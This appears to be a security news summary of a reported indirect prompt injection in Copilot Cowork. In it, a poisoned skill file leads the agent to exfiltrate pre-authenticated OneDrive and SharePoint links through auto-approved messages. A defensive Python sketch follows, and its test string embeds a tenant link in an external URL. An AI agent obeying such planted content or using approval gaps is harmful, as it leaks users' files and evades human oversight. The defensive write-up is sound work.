Copilot Cowork Exfiltrates Files via Prompt Injection
Copilot Cowork can be tricked into exfiltrating pre-authenticated OneDrive and SharePoint links through indirect prompt injection in a poisoned skill file. The issue hinges on automatic approvals for messages sent to the active user, which lets malicious content trigger outbound requests when those messages are opened.
This is the kind of failure that matters more than model quality: once an agent gets broad tenant access, security becomes a permissions and workflow problem, not an intelligence problem.
- The weak spot is the approval boundary: messages sent to the active user are approved automatically, so they go out without human confirmation
- A poisoned skill file is a nasty delivery vector because it looks like normal user content, not a malicious payload
- PromptArmor says the attack was model-agnostic and succeeded even with Claude Opus 4.7, so better reasoning does not fix bad control flow
- The practical defense is stricter Graph permissions, tighter SharePoint download policies, and much less trust in shared skill artifacts
- Scheduled or unattended agent tasks make this worse because the user is not present when the exfiltration step runs
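To make the approval-boundary point concrete, here is a minimal sketch of a check that could sit in front of auto-approved messages. It is not Copilot Cowork's actual logic or any Microsoft API: the function names, the `TRUSTED_HOSTS` allowlist, and the `contoso` hostnames are all hypothetical. The idea is simply that any message containing a URL to a host outside the tenant's allowlist loses automatic approval and waits for a human.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real tenant would derive this from its own policy.
TRUSTED_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

# Rough URL matcher; stops at whitespace, quotes, and closing brackets.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)\]]+", re.IGNORECASE)


def untrusted_urls(message_body, trusted_hosts=TRUSTED_HOSTS):
    """Return every URL in the message whose host is not on the allowlist."""
    flagged = []
    for url in URL_PATTERN.findall(message_body):
        host = (urlparse(url).hostname or "").lower()
        if host not in trusted_hosts:
            flagged.append(url)
    return flagged


def requires_human_approval(message_body, trusted_hosts=TRUSTED_HOSTS):
    """Assumed policy: any untrusted URL removes automatic approval."""
    return bool(untrusted_urls(message_body, trusted_hosts))


if __name__ == "__main__":
    # A tenant link smuggled inside the query string of an external URL.
    poisoned = (
        "Summary ready. ![status](https://attacker.example/c"
        "?d=https://contoso-my.sharepoint.com/shared-link)"
    )
    benign = "Report: https://contoso.sharepoint.com/sites/team/report.docx"
    print(requires_human_approval(poisoned))
    print(requires_human_approval(benign))
```

A host allowlist is deliberately blunt. It does not try to judge whether the text is malicious, which fits the point that this is a control-flow problem, not a reasoning problem. It would not help if the exfiltration channel is itself a trusted host, so it complements tighter permissions and download policies and does not replace them.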
DISCOVERED
2026-05-26
PUBLISHED
2026-05-25
AUTHOR
Kneenex